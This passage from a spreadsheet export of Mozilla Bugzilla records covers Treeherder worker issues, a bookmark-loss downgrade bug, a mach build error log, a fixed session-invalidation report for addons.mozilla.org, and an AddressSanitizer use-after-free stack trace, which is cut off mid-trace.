Note some of the above appears to be stuck processes, presumably a la bug 1131059, and they'd probably be fine after being killed:
[treeherder-processor2.stage.private.scl3.mozilla.com] out: 10-04:06:29 /usr/bin/python /usr/bin/celery -A treeherder worker -Q log_parser_fail,log_parser,log_parser_hp --logfile=/var/log/celery/celery_worker_log_parser.log -l INFO --maxtasksperchild=500 -n log_parser.%h
[treeherder-processor2.stage.private.scl3.mozilla.com] out: 10-04:37:24 /usr/bin/python /usr/bin/celery -A treeherder worker -Q log_parser_fail,log_parser,log_parser_hp --logfile=/var/log/celery/celery_worker_log_parser.log -l INFO --maxtasksperchild=500 -n log_parser.%h
However running gunicorn with Python 2.6 is causing things like:
https://rpm.newrelic.com/accounts/677903/applications/5585473/traced_errors/3098137500/similar_errors?original_error_id=3098137500</t>
        </is>
      </c>
      <c r="X5638" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5639">
      <c r="A5639" t="n">
        <v>1415133</v>
      </c>
      <c r="B5639" t="inlineStr">
        <is>
          <t>2017-11-07 04:29:55 -0800</t>
        </is>
      </c>
      <c r="C5639" t="inlineStr">
        <is>
          <t>Downgrading Firefox 57 to 52 ESR loses bookmarks</t>
        </is>
      </c>
      <c r="D5639" t="inlineStr">
        <is>
          <t>2018-04-09 05:05:41 -0700</t>
        </is>
      </c>
      <c r="E5639" t="n">
        <v>1</v>
      </c>
      <c r="F5639" t="n">
        <v>1</v>
      </c>
      <c r="G5639" t="n">
        <v>2</v>
      </c>
      <c r="H5639" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5639" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5639" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K5639" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5639" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5639" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5639" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5639" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5639" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q5639" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5639" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5639" t="inlineStr">
        <is>
          <t>Firefox 52</t>
        </is>
      </c>
      <c r="T5639" t="n">
        <v>1</v>
      </c>
      <c r="U5639" t="n">
        <v>0</v>
      </c>
      <c r="V5639" t="n">
        <v>30</v>
      </c>
      <c r="W5639" t="inlineStr">
        <is>
          <t>Jim informs me that the a11y team plans to prompt a small percentage of users with unsupported configurations in 57 to switch to 52 ESR instead (temporarily?). Downgrading versions in the same profile is unsupported, but this specific case may merit some additional work. 
One thing we discovered is that bookmarks are lost if a user in a new profile created with 57 switches to 52 ESR. Old profiles upgrading to 57 and then downgrading to 52 ESR might not face this issue. Marco is doing the investigation.</t>
        </is>
      </c>
      <c r="X5639" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5640">
      <c r="A5640" t="n">
        <v>1286619</v>
      </c>
      <c r="B5640" t="inlineStr">
        <is>
          <t>2016-07-13 11:07:59 -0700</t>
        </is>
      </c>
      <c r="C5640" t="inlineStr">
        <is>
          <t>Write Test cases for telemetry-schema-services</t>
        </is>
      </c>
      <c r="D5640" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E5640" t="n">
        <v>1</v>
      </c>
      <c r="F5640" t="n">
        <v>1</v>
      </c>
      <c r="G5640" t="n">
        <v>6</v>
      </c>
      <c r="H5640" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5640" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J5640" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K5640" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5640" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5640" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5640" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5640" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5640" t="inlineStr"/>
      <c r="Q5640" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5640" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5640" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5640" t="n">
        <v>1</v>
      </c>
      <c r="U5640" t="n">
        <v>0</v>
      </c>
      <c r="V5640" t="n">
        <v>2</v>
      </c>
      <c r="W5640" t="inlineStr">
        <is>
          <t>Needs tests; will enable seamless integration with docker with circleCI</t>
        </is>
      </c>
      <c r="X5640" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5641">
      <c r="A5641" t="n">
        <v>1406309</v>
      </c>
      <c r="B5641" t="inlineStr">
        <is>
          <t>2017-10-06 00:41:35 -0700</t>
        </is>
      </c>
      <c r="C5641" t="inlineStr">
        <is>
          <t>better handling of the clobber need when using 'mach static-analysis'</t>
        </is>
      </c>
      <c r="D5641" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E5641" t="n">
        <v>1</v>
      </c>
      <c r="F5641" t="n">
        <v>1</v>
      </c>
      <c r="G5641" t="n">
        <v>7</v>
      </c>
      <c r="H5641" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5641" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J5641" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K5641" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5641" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5641" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5641" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5641" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5641" t="inlineStr"/>
      <c r="Q5641" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5641" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5641" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T5641" t="n">
        <v>1</v>
      </c>
      <c r="U5641" t="n">
        <v>0</v>
      </c>
      <c r="V5641" t="n">
        <v>7</v>
      </c>
      <c r="W5641" t="inlineStr">
        <is>
          <t>$ ./mach static-analysis check --check google-readability-braces-around-statements --fix dom/presentation/Presentation.cpp 
 0:00.37 /usr/bin/make -C /home/sylvestre/dev/mozilla/mozilla-central.hg/obj-x86_64-pc-linux-gnu -j4 -s -w pre-export
 0:00.38 make : on entre dans le répertoire « /home/sylvestre/dev/mozilla/mozilla-central.hg/obj-x86_64-pc-linux-gnu »
 0:00.67 Build configuration changed. Regenerating backend.
 0:00.93 Reticulating splines...
 0:20.56 Finished reading 1311 moz.build files in 8.39s
 0:20.56 Read 118 gyp files in parallel contributing 0.00s to total wall time
 0:20.56 Processed into 10526 build config descriptors in 5.26s
 0:20.56 RecursiveMake backend executed in 4.66s
 0:20.56   3143 total backend files; 2 created; 43 updated; 3098 unchanged; 0 deleted; 53 -&gt; 1179 Makefile
 0:20.56 FasterMake backend executed in 0.63s
 0:20.56   18 total backend files; 0 created; 2 updated; 16 unchanged; 0 deleted
 0:20.56 Total wall time: 19.67s; CPU time: 16.83s; Efficiency: 86%; Untracked: 0.74s
 0:21.26 STOP!  The CLOBBER file has changed.
 0:21.26 STOP!  /home/sylvestre/dev/mozilla/mozilla-central.hg/js/src/old-configure.in has changed, and your configure is out of date.
 0:21.26 STOP!  /home/sylvestre/dev/mozilla/mozilla-central.hg/old-configure.in has changed, and your configure is out of date.
 0:21.26 Please run the build through a sanctioned build wrapper, such as
 0:21.26 Please rerun autoconf and re-configure your build directory.
 0:21.26 Please rerun autoconf and re-configure your build directory.
 0:21.26 To ignore this message, touch "/home/sylvestre/dev/mozilla/mozilla-central.hg/js/src/configure",
 0:21.26 "mach build" or client.mk.
 0:21.26 but your build might not succeed.
 0:21.26 To ignore this message, touch "/home/sylvestre/dev/mozilla/mozilla-central.hg/configure",
 0:21.26 but your build might not succeed.
 0:21.26 Makefile:71 : la recette pour la cible « CLOBBER » a échouée
 0:21.26 make: *** [CLOBBER] Erreur 1
 0:21.26 make: *** Attente des tâches non terminées....
 0:21.26 Makefile:80 : la recette pour la cible « /home/sylvestre/dev/mozilla/mozilla-central.hg/js/src/configure » a échouée
 0:21.27 make: *** [/home/sylvestre/dev/mozilla/mozilla-central.hg/js/src/configure] Erreur 1
 0:21.27 Makefile:80 : la recette pour la cible « /home/sylvestre/dev/mozilla/mozilla-central.hg/configure » a échouée
 0:21.27 make: *** [/home/sylvestre/dev/mozilla/mozilla-central.hg/configure] Erreur 1
 0:21.27 make : on quitte le répertoire « /home/sylvestre/dev/mozilla/mozilla-central.hg/obj-x86_64-pc-linux-gnu »
Error running mach:
    ['static-analyzer', 'check', '--check', 'google-readability-braces-around-statements', '--fix', 'dom/presentation/Presentation.cpp']
The error occurred in code that was called by the mach command. This is either
a bug in the called code itself or in the way that mach is calling it.
You should consider filing a bug for this issue.
If filing a bug, please include the full output of mach, including this error
message.
The details of the failure are as follows:
Exception: Process executed with non-0 exit code 2: [u'/usr/bin/make', u'-C', u'/home/sylvestre/dev/mozilla/mozilla-central.hg/obj-x86_64-pc-linux-gnu', u'-j4', u'-s', u'-w', u'pre-export']
  File "/home/sylvestre/dev/mozilla/mozilla-central.hg/python/mozbuild/mozbuild/mach_commands.py", line 2219, in check
    rc = self._build_export(jobs=jobs, verbose=verbose)
  File "/home/sylvestre/dev/mozilla/mozilla-central.hg/python/mozbuild/mozbuild/mach_commands.py", line 2375, in _build_export
    line_handler=None, silent=not verbose)
  File "/home/sylvestre/dev/mozilla/mozilla-central.hg/python/mozbuild/mozbuild/base.py", line 670, in _run_make
    return fn(**params)
  File "/home/sylvestre/dev/mozilla/mozilla-central.hg/python/mozbuild/mozbuild/base.py", line 725, in _run_command_in_objdir
    return self.run_process(cwd=self.topobjdir, **args)
  File "/home/sylvestre/dev/mozilla/mozilla-central.hg/python/mach/mach/mixin/process.py", line 148, in run_process
    raise Exception('Process executed with non-0 exit code %d: %s' % (status, args))
Instead of the long error message, we should try to detect that a clobber is needed and do it directly (or at least show a better error message)</t>
        </is>
      </c>
      <c r="X5641" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5642">
      <c r="A5642" t="n">
        <v>1357725</v>
      </c>
      <c r="B5642" t="inlineStr">
        <is>
          <t>2017-04-19 05:32:48 -0700</t>
        </is>
      </c>
      <c r="C5642" t="inlineStr">
        <is>
          <t>Break auth on https://addons.mozilla.org</t>
        </is>
      </c>
      <c r="D5642" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:06 -0700</t>
        </is>
      </c>
      <c r="E5642" t="n">
        <v>1</v>
      </c>
      <c r="F5642" t="n">
        <v>1</v>
      </c>
      <c r="G5642" t="n">
        <v>4</v>
      </c>
      <c r="H5642" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5642" t="inlineStr">
        <is>
          <t>addons.mozilla.org</t>
        </is>
      </c>
      <c r="J5642" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5642" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5642" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5642" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5642" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5642" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5642" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q5642" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5642" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5642" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5642" t="n">
        <v>0</v>
      </c>
      <c r="U5642" t="n">
        <v>0</v>
      </c>
      <c r="V5642" t="n">
        <v>11</v>
      </c>
      <c r="W5642" t="inlineStr">
        <is>
          <t>Hi team,
I noticed an authentication break at https://addons.mozilla.org
POC
1 access https://accounts.firefox.com on two devices&gt; when the password is changed on one of the devices the session is immediately interrupted on the other device
2 access https://accounts.firefox.com and on another device https://addons.mozilla.org (https://addons.mozilla.org uses the same credentials as https://accounts.firefox.com)&gt; Change your account password at https://accounts.firefox.com&gt; the session remains active at https://addons.mozilla.org
In this scenario I am using a valid session at https://addons.mozilla.org from a different password.
Please check it.</t>
        </is>
      </c>
      <c r="X5642" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5643">
      <c r="A5643" t="n">
        <v>1463121</v>
      </c>
      <c r="B5643" t="inlineStr">
        <is>
          <t>2018-05-21 06:11:54 -0700</t>
        </is>
      </c>
      <c r="C5643" t="inlineStr">
        <is>
          <t>move "signatures" table to django-land</t>
        </is>
      </c>
      <c r="D5643" t="inlineStr">
        <is>
          <t>2018-10-30 13:13:44 -0700</t>
        </is>
      </c>
      <c r="E5643" t="n">
        <v>1</v>
      </c>
      <c r="F5643" t="n">
        <v>1</v>
      </c>
      <c r="G5643" t="n">
        <v>4</v>
      </c>
      <c r="H5643" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5643" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5643" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K5643" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5643" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5643" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5643" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5643" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5643" t="inlineStr"/>
      <c r="Q5643" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5643" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5643" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5643" t="n">
        <v>1</v>
      </c>
      <c r="U5643" t="n">
        <v>0</v>
      </c>
      <c r="V5643" t="n">
        <v>18</v>
      </c>
      <c r="W5643" t="inlineStr">
        <is>
          <t>Socorro keeps track of the first build id and report date for signatures in the "signatures" table. This is currently managed by alembic/sqlalchemy.
This bug covers moving that table to Django.</t>
        </is>
      </c>
      <c r="X5643" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5644">
      <c r="A5644" t="n">
        <v>881440</v>
      </c>
      <c r="B5644" t="inlineStr">
        <is>
          <t>2013-06-10 13:23:46 -0700</t>
        </is>
      </c>
      <c r="C5644" t="inlineStr">
        <is>
          <t>Implement site-wide alerts/announcements</t>
        </is>
      </c>
      <c r="D5644" t="inlineStr">
        <is>
          <t>2013-06-25 13:07:56 -0700</t>
        </is>
      </c>
      <c r="E5644" t="n">
        <v>1</v>
      </c>
      <c r="F5644" t="n">
        <v>1</v>
      </c>
      <c r="G5644" t="n">
        <v>5</v>
      </c>
      <c r="H5644" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5644" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5644" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5644" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5644" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5644" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5644" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5644" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5644" t="inlineStr">
        <is>
          <t>u=user c=general p=3 s=2013.12</t>
        </is>
      </c>
      <c r="Q5644" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5644" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5644" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T5644" t="n">
        <v>1</v>
      </c>
      <c r="U5644" t="n">
        <v>0</v>
      </c>
      <c r="V5644" t="n">
        <v>8</v>
      </c>
      <c r="W5644" t="inlineStr">
        <is>
          <t>We need to display alerts related to service outages affecting Persona, Marketplace and Product Delivery. IT is creating a service (whistlepig) that we will be able to poll for outages: https://whistlepig-dev.allizom.org/en-US/api/v1/statusupdate/
For now though, we just need to be able to manually create alerts from the django admin. It should be very similar to what we have in our announcements app already, but the announcement would be global.
As for the UI, I was told by Kadir that we should try to re-use the warning we are showing users of old versions of Firefox.</t>
        </is>
      </c>
      <c r="X5644" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5645">
      <c r="A5645" t="n">
        <v>772346</v>
      </c>
      <c r="B5645" t="inlineStr">
        <is>
          <t>2012-07-09 22:34:53 -0700</t>
        </is>
      </c>
      <c r="C5645" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsHTMLEditRules::DeleteNonTableElements</t>
        </is>
      </c>
      <c r="D5645" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:20 -0700</t>
        </is>
      </c>
      <c r="E5645" t="n">
        <v>1</v>
      </c>
      <c r="F5645" t="n">
        <v>1</v>
      </c>
      <c r="G5645" t="n">
        <v>3</v>
      </c>
      <c r="H5645" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5645" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5645" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K5645" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5645" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5645" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5645" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5645" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5645" t="inlineStr">
        <is>
          <t>[asan][fixed by bug 775552 for Firefox 15][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5645" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5645" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5645" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T5645" t="n">
        <v>1</v>
      </c>
      <c r="U5645" t="n">
        <v>0</v>
      </c>
      <c r="V5645" t="n">
        <v>19</v>
      </c>
      <c r="W5645" t="inlineStr">
        <is>
          <t>Reproduces on trunk. My repro is ugly but reproduces reliably on my local machine. I will attach something here once i get a better minimized repro. 
I debugged and didnt see a reason to wait for filing. Some of the stack frames are missing b/w #0 and #1 since this is an optimized build. But GetPreviousSibling() in #0 [see nsHTMLEditRules::DeleteNonTableElements] tells that the stale child is being accessed. It looks like raw ptr issue probably coming from http://hg.mozilla.org/mozilla-central/diff/270ac87cffba/editor/libeditor/html/nsHTMLEditRules.cpp#l1.85. When i changed to nsCOMPtr and recompiled, crash stopped.
=================================================================
==19766== ERROR: AddressSanitizer heap-use-after-free on address 0x7fc1cdd689b8 at pc 0x7fc20556baa8 bp 0x7fff36485200 sp 0x7fff364851f8
READ of size 8 at 0x7fc1cdd689b8 thread T0
    #0 0x7fc20556baa8 in nsINode::GetPreviousSibling() const firefox/src/modules/zlib/src/inffast.c:0
    #1 0x7fc2062f5dc0 in nsHTMLEditRules::WillDoAction(mozilla::Selection*, nsRulesInfo*, bool*, bool*) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:577
    #2 0x7fc20618d040 in nsPlaintextEditor::DeleteSelection(short, short) firefox/src/editor/libeditor/text/nsPlaintextEditor.cpp:657
    #3 0x7fc2062f6468 in nsHTMLEditRules::WillInsertText(nsEditor::OperationID, mozilla::Selection*, bool*, bool*, nsAString_internal const*, nsAString_internal*, int) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:1260
    #4 0x7fc2062f5ca3 in nsHTMLEditRules::WillDoAction(mozilla::Selection*, nsRulesInfo*, bool*, bool*) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:570
    #5 0x7fc20618d5ec in nsPlaintextEditor::InsertText(nsAString_internal const&amp;) firefox/src/editor/libeditor/text/nsPlaintextEditor.cpp:700
    #6 0x7fc2061c3c67 in nsInsertPlaintextCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) firefox/src/editor/libeditor/base/nsEditorCommands.cpp:834
    #7 0x7fc2069858a9 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) firefox/src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
    #8 0x7fc20697ec11 in nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) firefox/src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:153
    #9 0x7fc2069824f7 in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) firefox/src/embedding/components/commandhandler/src/nsCommandManager.cpp:238
    #10 0x7fc205de5469 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) firefox/src/content/html/document/src/nsHTMLDocument.cpp:3218
    #11 0x7fc20721b125 in NS_InvokeByIndex_P firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:164
    #12 0x7fc2066bdce8 in CallMethodHelper::Invoke() firefox/src/js/xpconnect/src/XPCWrappedNative.cpp:3071
    #13 0x7fc2066cbfee in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) firefox/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #14 0x7fc207b2807f in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) firefox/src/js/src/jscntxtinlines.h:400
    #15 0x7fc207b1de9e in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2465
    #16 0x7fc207b09315 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:299
    #17 0x7fc207b29467 in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:482
    #18 0x7fc207b297f1 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:519
    #19 0x7fc207a3a713 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5370
    #20 0x7fc207a3a9d9 in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5407
    #21 0x7fc205f23907 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1466
    #22 0x7fc205f7eece in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9519
    #23 0x7fc205f6e285 in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9783
    #24 0x7fc205f7e378 in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:10055
    #25 0x7fc2071f9094 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:473
    #26 0x7fc2071f95e6 in nsTimerEvent::Run() firefox/src/xpcom/threads/nsTimerImpl.cpp:559
    #27 0x7fc2071ef654 in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:624
    #28 0x7fc20716061d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:217
    #29 0x7fc206f5fd48 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #30 0x7fc20726091f in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #31 0x7fc206d6f73e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #32 0x7fc205171943 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
    #33 0x7fc205172272 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3940
    #34 0x409e93 in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #35 0x40957d in main firefox/src/browser/app/nsBrowserApp.cpp:330
    #36 0x7fc20c9a2c4d in ?? ??:0
0x7fc1cdd689b8 is located 56 bytes inside of 120-byte region [0x7fc1cdd68980,0x7fc1cdd689f8)
freed by thread T0 here:
    #0 0x425a42 in free ??:0
    #1 0x7fc205b17a9b in nsNodeUtils::LastRelease(nsINode*) firefox/src/content/base/src/nsNodeUtils.cpp:252
    #2 0x7fc205ad86df in nsGenericDOMDataNode::Release() firefox/src/content/base/src/nsGenericDOMDataNode.cpp:113
    #3 0x7fc2063169ad in nsHTMLEditRules::DeleteNonTableElements(nsINode*) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:2824
    #4 0x7fc2062f5dc0 in nsHTMLEditRules::WillDoAction(mozilla::Selection*, nsRulesInfo*, bool*, bool*) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:577
    #5 0x7fc20618d040 in nsPlaintextEditor::DeleteSelection(short, short) firefox/src/editor/libeditor/text/nsPlaintextEditor.cpp:657
    #6 0x7fc2062f6468 in nsHTMLEditRules::WillInsertText(nsEditor::OperationID, mozilla::Selection*, bool*, bool*, nsAString_internal const*, nsAString_internal*, int) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:1260
    #7 0x7fc2062f5ca3 in nsHTMLEditRules::WillDoAction(mozilla::Selection*, nsRulesInfo*, bool*, bool*) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:570
    #8 0x7fc20618d5ec in nsPlaintextEditor::InsertText(nsAString_internal const&amp;) firefox/src/editor/libeditor/text/nsPlaintextEditor.cpp:700
    #9 0x7fc2061c3c67 in nsInsertPlaintextCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) firefox/src/editor/libeditor/base/nsEditorCommands.cpp:834
    #10 0x7fc2069858a9 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) firefox/src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
    #11 0x7fc20697ec11 in nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) firefox/src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:153
    #12 0x7fc2069824f7 in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) firefox/src/embedding/components/commandhandler/src/nsCommandManager.cpp:238
    #13 0x7fc205de5469 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) firefox/src/content/html/document/src/nsHTMLDocument.cpp:3218
    #14 0x7fc20721b125 in NS_InvokeByIndex_P firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:164
    #15 0x7fc2066bdce8 in CallMethodHelper::Invoke() firefox/src/js/xpconnect/src/XPCWrappedNative.cpp:3071
    #16 0x7fc2066cbfee in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) firefox/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #17 0x7fc207b2807f in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) firefox/src/js/src/jscntxtinlines.h:400
    #18 0x7fc207b1de9e in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2465
    #19 0x7fc207b09315 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:299
    #20 0x7fc207b29467 in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:482
    #21 0x7fc207b297f1 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:519
